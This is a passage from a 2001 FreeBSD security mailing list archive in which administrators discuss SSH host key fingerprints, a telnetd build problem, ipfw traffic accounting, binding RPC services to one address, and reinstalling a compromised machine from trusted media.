(PDT) (envelope-from sjohn@airlinksys.com) Received: from sjohn.airlinksys.com (sjohn.airlinksys.com [216.70.12.7]) by mailhub.airlinksys.com (Postfix) with ESMTP id 548F253510 for ; Fri, 27 Jul 2001 01:16:47 -0500 (CDT) Received: by sjohn.airlinksys.com (Postfix, from userid 1000) id 266BA5DCC; Fri, 27 Jul 2001 01:16:47 -0500 (CDT) Date: Fri, 27 Jul 2001 01:16:47 -0500 From: Scott Johnson To: freebsd-security@freebsd.org Subject: ssh_host_dsa_key fingerprint Message-ID: <20010727011647.A69806@sjohn.airlinksys.com> Reply-To: Scott Johnson Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If you're like me and wondered how to get a fingerprint for your DSA host key: start ssh-agent, add the host key, and list your keys. If you don't care or already figured out a way, disregard this message. :-) -- Scott Johnson System/Network Administrator Airlink Systems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 4:36:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts5-srv.bellnexxia.net (tomts5.bellnexxia.net [209.226.175.25]) by hub.freebsd.org (Postfix) with ESMTP id ED3DF37B405 for ; Fri, 27 Jul 2001 04:36:47 -0700 (PDT) (envelope-from matt@gsicomp.on.ca) Received: from xena.gsicomp.on.ca ([64.228.155.124]) by tomts5-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20010727113647.JOXC1934.tomts5-srv.bellnexxia.net@xena.gsicomp.on.ca> for ; Fri, 27 Jul 2001 07:36:47 -0400 Received: from hermes (hermes.gsicomp.on.ca [192.168.0.18]) by xena.gsicomp.on.ca (8.11.1/8.11.1) with SMTP id f6RBYAc99730 for ; Fri, 27 Jul 2001 07:34:10 -0400 (EDT) (envelope-from matt@gsicomp.on.ca) Message-ID: <005301c1168f$cc478c60$1200a8c0@gsicomp.on.ca> From: "Matthew Emmerton" To: Subject: problem with telnetd patch Date: Fri, 27 Jul 2001 07:32:20 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [ please cc, not on security- ] Folks, I just updated one of my client's machines to RELENG_4_3, and attempted to update telnetd. I used: cd /usr/src/secure/libexec/telnetd make depend && make all install which failed, complaining of unresolved Kerberos symbols. To fix the problem, I had to add ${LIBKRB} and ${LIBCOM_ERR} to the DPADD line of the Makefile, and -lkrb and -lcom_err to the LDADD line of the Makefile. The machine that I was upgrading was a clean install of 4.3-REL from a few months ago, no cvsup's of any source since then. Any ideas why I was running into this problem? -- Matt Emmerton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 7:53:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id BB15137B403 for ; Fri, 27 Jul 2001 07:53:30 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 25592 invoked by uid 1000); 27 Jul 2001 15:04:48 -0000 Date: Fri, 27 Jul 2001 17:04:48 +0200 From: "Karsten W. Rohrbach" To: Scott Johnson Cc: freebsd-security@freebsd.org Subject: Re: ssh_host_dsa_key fingerprint Message-ID: <20010727170448.I23159@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Scott Johnson , freebsd-security@freebsd.org References: <20010727011647.A69806@sjohn.airlinksys.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="wZdghQXYJzyo6AGC" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010727011647.A69806@sjohn.airlinksys.com>; from sjohn@airlinksys.com on Fri, Jul 27, 2001 at 01:16:47AM -0500 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --wZdghQXYJzyo6AGC Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Scott Johnson(sjohn@airlinksys.com)@2001.07.27 01:16:47 +0000: > If you're like me and wondered how to get a fingerprint for your DSA host > key: start ssh-agent, add the host key, and list your keys. >=20 > If you don't care or already figured out a way, disregard this message. > :-) man ssh-keygen(1): -l Show fingerprint of specified private or public key file. have fun, /k --=20 > If you meet somebody who tells you that he loves you more than anybody > in the whole wide world, don't trust him. It means he experiments. KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --wZdghQXYJzyo6AGC Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YYMQM0BPTilkv0YRAvBBAJ9PdMWQu6QGbHeZ6LDcmwagBw1h3gCeMGdC ZFRtL0ZCDW2/yAwAc+i6VhQ= =84SJ -----END PGP SIGNATURE----- --wZdghQXYJzyo6AGC-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 8:19:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 4300C37B406 for ; Fri, 27 Jul 2001 08:19:11 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id TAA81553; Fri, 27 Jul 2001 19:18:50 +0400 (MSD) Date: Fri, 27 Jul 2001 19:18:53 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" Organization: IHelp X-Priority: 3 (Normal) Message-ID: <15993079421.20010727191853@internethelp.ru> To: Mike Silbersack Cc: security@FreeBSD.ORG Subject: Re[2]: accounting with ipfw (gid, uid riles) In-reply-To: <20010726212826.J40333-100000@achilles.silby.com> References: <20010726212826.J40333-100000@achilles.silby.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Mike, Friday, July 27, 2001, 6:31:20 AM, you wrote: MS> On Thu, 26 Jul 2001, Nickolay A.Kritsky wrote: >> 01010 count ip from any to 212.113.112.145 via rl0 >> 01010 count ip from 212.113.112.145 to any via rl0 >> 01010 count ip from any to 212.113.112.145 uid nobody via rl0 >> 01010 count ip from any to 212.113.112.145 uid root via rl0 >> 01010 count ip from any to 212.113.112.145 uid httpd via rl0 >> 01010 count ip from any to 212.113.112.145 uid ftp via rl0 MS> The uid associated with a socket is the uid of the process which created MS> it. So, when apache creates a socket as root, then hands it off to one of MS> the httpd processes, it's still accounted to root. This should be true MS> for any socket running on a port < 1024, as they have to be allocated as MS> root. do you mean that after this code: //---------------------------------------------------------------- setuid(0); s=socket(...); listen(s,1); if (fork()!=-1) { setuid(1); k=accept(s); } . . . //---------------------------------------------------------------- socket pointed by k will be "owned" by root? Anyway, it is not the main point of my question. Accounting httpd traffic is just a piece of cake - the port is fixed, the address is fixed. But I wanted to count Squid traffic. AFAIK Squid does not any setuid() voodoo, except for priviledges drop at startup. After that it runs strictly uid 'nobody'. But squid's traffic doesn't hit the counter!!! I wonder why. Maybe it is because of natd running on outer interface? But why then some packets hit the counter? MS> So, you're going to have to account by port numbers. In httpd's case, MS> that shouldn't be a problem. In ftp's case, that's another story. in squid's case it is just impossible :\ . All I can think about so far, is adding alias interface, bind squid to this interface and count with host src and dst fields, but adding another alias network interface every time I add some new daemon, and want to account his traffic, looks a little funny. IMHO, it looks just awful. MS> FWIW, I had a patch which made the uid switch during accept on -current, MS> but I figured that there were some subtle security-related problems with MS> it and subsequently pigeonholed it. Sorry, but what does FWIW mean? MS> Mike "Silby" Silbersack MS> To Unsubscribe: send mail to majordomo@FreeBSD.org MS> with "unsubscribe freebsd-security" in the body of the message ;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 8:25:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 693B837B403 for ; Fri, 27 Jul 2001 08:25:30 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 2563 invoked by uid 1000); 27 Jul 2001 15:24:33 -0000 Date: Fri, 27 Jul 2001 18:24:33 +0300 From: Peter Pentchev To: "Karsten W. Rohrbach" Cc: Scott Johnson , freebsd-security@freebsd.org Subject: Re: ssh_host_dsa_key fingerprint Message-ID: <20010727182433.A1105@ringworld.oblivion.bg> Mail-Followup-To: "Karsten W. Rohrbach" , Scott Johnson , freebsd-security@freebsd.org References: <20010727011647.A69806@sjohn.airlinksys.com> <20010727170448.I23159@mail.webmonster.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010727170448.I23159@mail.webmonster.de>; from karsten@rohrbach.de on Fri, Jul 27, 2001 at 05:04:48PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jul 27, 2001 at 05:04:48PM +0200, Karsten W. Rohrbach wrote: > Scott Johnson(sjohn@airlinksys.com)@2001.07.27 01:16:47 +0000: > > If you're like me and wondered how to get a fingerprint for your DSA host > > key: start ssh-agent, add the host key, and list your keys. > > > > If you don't care or already figured out a way, disregard this message. > > :-) > > man ssh-keygen(1): > > -l Show fingerprint of specified private or public key file. Does this work for DSA though? [root@ringworld:v3 ~]# ssh-keygen -lf /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key is not a valid key file. [root@ringworld:v3 ~]# ssh-keygen -lf /etc/ssh/ssh_host_key 1024 fc:1f:cf:8c:5c:dc:10:d7:80:21:a3:cc:3b:b2:9f:9d root@ringworld.office1.bg [root@ringworld:v3 ~]# Seems to work OK for the RSA host key.. This is on a -stable rebuilt today: [root@ringworld:v3 ~]# ssh -V SSH Version OpenSSH_2.3.0 green@FreeBSD.org 20010321, protocol versions 1.5/2.0. Compiled with SSL (0x0090601f). G'luck, Peter -- When you are not looking at it, this sentence is in Spanish. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 8:57:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id B3CE537B403 for ; Fri, 27 Jul 2001 08:57:46 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 26846 invoked by uid 1000); 27 Jul 2001 16:08:44 -0000 Date: Fri, 27 Jul 2001 18:08:44 +0200 From: "Karsten W. Rohrbach" To: Scott Johnson , freebsd-security@freebsd.org Subject: Re: ssh_host_dsa_key fingerprint Message-ID: <20010727180844.M23159@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Scott Johnson , freebsd-security@freebsd.org References: <20010727011647.A69806@sjohn.airlinksys.com> <20010727170448.I23159@mail.webmonster.de> <20010727182433.A1105@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="W4pDZ/VvazBYHhxQ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010727182433.A1105@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Jul 27, 2001 at 06:24:33PM +0300 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --W4pDZ/VvazBYHhxQ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Peter Pentchev(roam@orbitel.bg)@2001.07.27 18:24:33 +0000: > On Fri, Jul 27, 2001 at 05:04:48PM +0200, Karsten W. Rohrbach wrote: > > Scott Johnson(sjohn@airlinksys.com)@2001.07.27 01:16:47 +0000: > > > If you're like me and wondered how to get a fingerprint for your DSA = host > > > key: start ssh-agent, add the host key, and list your keys. > > >=20 > > > If you don't care or already figured out a way, disregard this messag= e. > > > :-) > >=20 > > man ssh-keygen(1): > >=20 > > -l Show fingerprint of specified private or public key file. >=20 > Does this work for DSA though? >=20 > [root@ringworld:v3 ~]# ssh-keygen -lf /etc/ssh/ssh_host_dsa_key > /etc/ssh/ssh_host_dsa_key is not a valid key file. > [root@ringworld:v3 ~]# ssh-keygen -lf /etc/ssh/ssh_host_key > 1024 fc:1f:cf:8c:5c:dc:10:d7:80:21:a3:cc:3b:b2:9f:9d root@ringworld.offic= e1.bg > [root@ringworld:v3 ~]# >=20 > Seems to work OK for the RSA host key.. > This is on a -stable rebuilt today: >=20 > [root@ringworld:v3 ~]# ssh -V > SSH Version OpenSSH_2.3.0 green@FreeBSD.org 20010321, protocol versions 1= .5/2.0. > Compiled with SSL (0x0090601f). peter, as always, you are right. this works only for rsa keys. my fault ;-) /k --=20 > "Her figure described a set of parabolas that could cause cardiac arrest > in a yak." --Woody Allen KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --W4pDZ/VvazBYHhxQ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YZIMM0BPTilkv0YRApZ7AJ48aKWe62iDeobYc1XXJtSSxLCD2wCfeWWL GJfo47iBC8IJJILUqOxBzmQ= =0/ot -----END PGP SIGNATURE----- --W4pDZ/VvazBYHhxQ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 9:35:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from polychrome.durny.com (polychrome.durny.com [62.32.172.204]) by hub.freebsd.org (Postfix) with ESMTP id 2621F37B401 for ; Fri, 27 Jul 2001 09:35:28 -0700 (PDT) (envelope-from gdef@polychrome.durny.com) Received: from gdef (helo=localhost) by polychrome.durny.com with local-esmtp (Exim 3.31 #1) id 15QAUR-0001kG-00 for freebsd-security@FreeBSD.org; Fri, 27 Jul 2001 18:29:27 +0200 Date: Fri, 27 Jul 2001 18:29:27 +0200 (CEST) From: To: Subject: RPC opens ports on all aliases Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Is there any possibility to make RPC services to open tcp ports only on specified IP adres? I modified portmap source to open TCP port 111 only on given IP. But services eg nfs still open ports on all ip. Any solution? Defio To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 9:54: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 3D42E37B401 for ; Fri, 27 Jul 2001 09:54:05 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 8920 invoked by uid 1000); 27 Jul 2001 16:53:08 -0000 Date: Fri, 27 Jul 2001 19:53:08 +0300 From: Peter Pentchev To: gdef@polychrome.durny.com Cc: freebsd-security@FreeBSD.org Subject: Re: RPC opens ports on all aliases Message-ID: <20010727195308.D1105@ringworld.oblivion.bg> Mail-Followup-To: gdef@polychrome.durny.com, freebsd-security@FreeBSD.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from gdef@polychrome.durny.com on Fri, Jul 27, 2001 at 06:29:27PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jul 27, 2001 at 06:29:27PM +0200, gdef@polychrome.durny.com wrote: > > Hi, > > Is there any possibility to make RPC services to open tcp ports only on > specified IP adres? I modified portmap source to open TCP port 111 only > on given IP. But services eg nfs still open ports on all ip. > > Any solution? Yes; provide the necessary command-line options to the various servers. For example, the nfsd(8) manual page documents a -h option, which specifies an IP address to bind to. The portmap(8) manual page also documents an -h option. You can pass command-line options to the servers on startup by adding the corresponding variable definitions in your /etc/rc.conf file. You can see all the available variables by either reading the rc.conf(5) manual page, or looking through the /etc/defaults/rc.conf file. DO NOT modify the /etc/defaults/rc.conf file! Simply reassign the variables you need in /etc/rc.conf. For portmap(8) and nfsd(8), the appropriate variables are portmap_flags and nfs_server_flags. G'luck, Peter -- If this sentence didn't exist, somebody would have invented it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 10: 6:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id DC4CD37B403 for ; Fri, 27 Jul 2001 10:06:31 -0700 (PDT) (envelope-from arr@watson.org) Received: from localhost (arr@localhost) by fledge.watson.org (8.11.4/8.11.4) with SMTP id f6RH6DL63496; Fri, 27 Jul 2001 13:06:13 -0400 (EDT) (envelope-from arr@watson.org) Date: Fri, 27 Jul 2001 13:06:12 -0400 (EDT) From: "Andrew R. Reiter" To: kris@obsecurity.org Cc: freebsd-security@freebsd.org Subject: inetd.conf -- IPv6 telnet Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org kris, just wondering about this thing i just noticed in 4-stable that telnet comes default running under IPv6 in inetd.conf. not sure how likely someone would exploit over IPv6, but i was wondering about consistancy in relation to what's being done already for IPv4? Andrew *-------------................................................. | Andrew R. Reiter | arr@fledge.watson.org | "It requires a very unusual mind | to undertake the analysis of the obvious" -- A.N. Whitehead To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 10: 9:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from bazooka.unixfreak.org (bazooka.unixfreak.org [63.198.170.138]) by hub.freebsd.org (Postfix) with ESMTP id B572637B403 for ; Fri, 27 Jul 2001 10:09:32 -0700 (PDT) (envelope-from dima@unixfreak.org) Received: by bazooka.unixfreak.org (Postfix, from userid 1000) id 53D803E31; Fri, 27 Jul 2001 10:09:32 -0700 (PDT) Received: from bazooka.unixfreak.org (localhost [127.0.0.1]) by bazooka.unixfreak.org (Postfix) with ESMTP id 48F9C3C12B; Fri, 27 Jul 2001 10:09:32 -0700 (PDT) To: Peter Pentchev Cc: "Karsten W. Rohrbach" , Scott Johnson , freebsd-security@freebsd.org Subject: Re: ssh_host_dsa_key fingerprint In-Reply-To: <20010727182433.A1105@ringworld.oblivion.bg>; from roam@orbitel.bg on "Fri, 27 Jul 2001 18:24:33 +0300" Date: Fri, 27 Jul 2001 10:09:27 -0700 From: Dima Dorfman Message-Id: <20010727170932.53D803E31@bazooka.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Peter Pentchev writes: > On Fri, Jul 27, 2001 at 05:04:48PM +0200, Karsten W. Rohrbach wrote: > > man ssh-keygen(1): > > > > -l Show fingerprint of specified private or public key file. > > Does this work for DSA though? Yes, with newer versions of OpenSSH, such as the one in -current. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 10:11:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from chrome.jdl.com (chrome.jdl.com [209.39.144.2]) by hub.freebsd.org (Postfix) with ESMTP id 1117F37B401 for ; Fri, 27 Jul 2001 10:11:11 -0700 (PDT) (envelope-from jdl@chrome.jdl.com) Received: from chrome.jdl.com (localhost [127.0.0.1]) by chrome.jdl.com (8.9.1/8.9.1) with ESMTP id MAA15378; Fri, 27 Jul 2001 12:16:16 -0500 (CDT) (envelope-from jdl@chrome.jdl.com) Message-Id: <200107271716.MAA15378@chrome.jdl.com> To: "Antoine Beaupre (LMC)" Cc: security@freebsd.org Subject: Re: Some Followup on that ypchfn mess of mine In-reply-to: Your message of "Fri, 27 Jul 2001 09:38:24 EDT." <3B616ED0.8050808@lmc.ericsson.se> Clarity-Index: null Threat-Level: none Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code. Net-thought: If you meet the Buddha on the net, put him in your Kill file. Date: Fri, 27 Jul 2001 12:16:16 -0500 From: Jon Loeliger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org So, like "Antoine Beaupre (LMC)" was saying to me just the other day: > Hi. > > Sorry to be a pain, but you really should kill this machine. Just backup > your data, format the drive and reinstall from trusted source. > > You can't just keep playing around this box and expect to fix > everything. Unless you already had some IDS such as tripwire, it's > almost impossible. > > Reinstall. It's for your own good. :) > > A. OK, I'll state it publicly: This machine will be rebuilt from sources. The old disk will be completely reformatted. I'm putting a new firewall in place first. jdl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 10:26:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.39]) by hub.freebsd.org (Postfix) with SMTP id 514DF37B401 for ; Fri, 27 Jul 2001 10:26:24 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 11291 invoked by uid 1000); 27 Jul 2001 17:25:27 -0000 Date: Fri, 27 Jul 2001 20:25:27 +0300 From: Peter Pentchev To: Jon Loeliger Cc: "Antoine Beaupre (LMC)" , security@freebsd.org Subject: Re: Some Followup on that ypchfn mess of mine Message-ID: <20010727202527.E1105@ringworld.oblivion.bg> Mail-Followup-To: Jon Loeliger , "Antoine Beaupre (LMC)" , security@freebsd.org References: <3B616ED0.8050808@lmc.ericsson.se> <200107271716.MAA15378@chrome.jdl.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200107271716.MAA15378@chrome.jdl.com>; from jdl@jdl.com on Fri, Jul 27, 2001 at 12:16:16PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jul 27, 2001 at 12:16:16PM -0500, Jon Loeliger wrote: > So, like "Antoine Beaupre (LMC)" was saying to me just the other day: > > Hi. > > > > Sorry to be a pain, but you really should kill this machine. Just backup > > your data, format the drive and reinstall from trusted source. > > > > You can't just keep playing around this box and expect to fix > > everything. Unless you already had some IDS such as tripwire, it's > > almost impossible. > > > > Reinstall. It's for your own good. :) > > > > A. > > OK, I'll state it publicly: > > This machine will be rebuilt from sources. > The old disk will be completely reformatted. > I'm putting a new firewall in place first. Sorry to be a pain ;) But sometimes, a rebuild from sources might not be enough: you'll have to perform at least the install on the machine in question (unless you take off the hard disk, mount it on another machine, build from sources, and install with a DESTDIR pointing to this machine's filesystems). This still poses a risk, albeit unlikely, of somebody having compromised your compiler, make(1), install(1), perl, and whatever else is running on the machine before the installation starts using the newly-compiled binaries. This is why I - following the advice of others, including http://www.FreeBSD.org/security/ - recommended backing up the data, then reinstalling from a CD (or over the net; the point is, reinstalling from a install medium completely unrelated to the compromised machine). G'luck, Peter -- Do you think anybody has ever had *precisely this thought* before? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 10:41:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from cvd.pl (cvd.pl [213.25.82.2]) by hub.freebsd.org (Postfix) with ESMTP id DA30E37B401 for ; Fri, 27 Jul 2001 10:40:36 -0700 (PDT) (envelope-from gdef@cvd.pl) Received: by cvd.pl (Postfix, from userid 1005) id 887D213FB21; Fri, 27 Jul 2001 19:42:10 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by cvd.pl (Postfix) with ESMTP id 75F2EF6127; Fri, 27 Jul 2001 19:42:10 +0200 (CEST) Date: Fri, 27 Jul 2001 19:42:10 +0200 (CEST) From: "Janusz Mucka (Defacto)" To: Peter Pentchev Cc: , Subject: Re: RPC opens ports on all aliases In-Reply-To: <20010727195308.D1105@ringworld.oblivion.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yes, I know about that. portmap_flags="-h 10.10.10.1" nfs_server_enable="YES" nfs_server_flags="-u -n 1 -h 10.10.10.1" No effect. There are still open TCP ports on all aliases Defio > Yes; provide the necessary command-line options to the various servers. > For example, the nfsd(8) manual page documents a -h option, which > specifies an IP address to bind to. The portmap(8) manual page also > documents an -h option. > > You can pass command-line options to the servers on startup by > adding the corresponding variable definitions in your /etc/rc.conf file. > You can see all the available variables by either reading the rc.conf(5) > manual page, or looking through the /etc/defaults/rc.conf file. > > DO NOT modify the /etc/defaults/rc.conf file! Simply reassign > the variables you need in /etc/rc.conf. > > For portmap(8) and nfsd(8), the appropriate variables are > portmap_flags and nfs_server_flags. > > G'luck, > Peter > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 11:19:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from cvd.pl (cvd.pl [213.25.82.2]) by hub.freebsd.org (Postfix) with ESMTP id CD21037B403 for ; Fri, 27 Jul 2001 11:19:10 -0700 (PDT) (envelope-from gdef@cvd.pl) Received: by cvd.pl (Postfix, from userid 1005) id F11E413FB21; Fri, 27 Jul 2001 20:21:04 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by cvd.pl (Postfix) with ESMTP id E34EEF6129 for ; Fri, 27 Jul 2001 20:21:04 +0200 (CEST) Date: Fri, 27 Jul 2001 20:21:04 +0200 (CEST) From: "Janusz Mucka (Defacto)" To: Subject: identd with NAT support Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Is there any implementation od identd which support identd on NAT like oidentd does. How to assign idents to windows machines through nat like oidentd does? Defio To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 11:39:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 4FBFF37B403 for ; Fri, 27 Jul 2001 11:39:09 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: 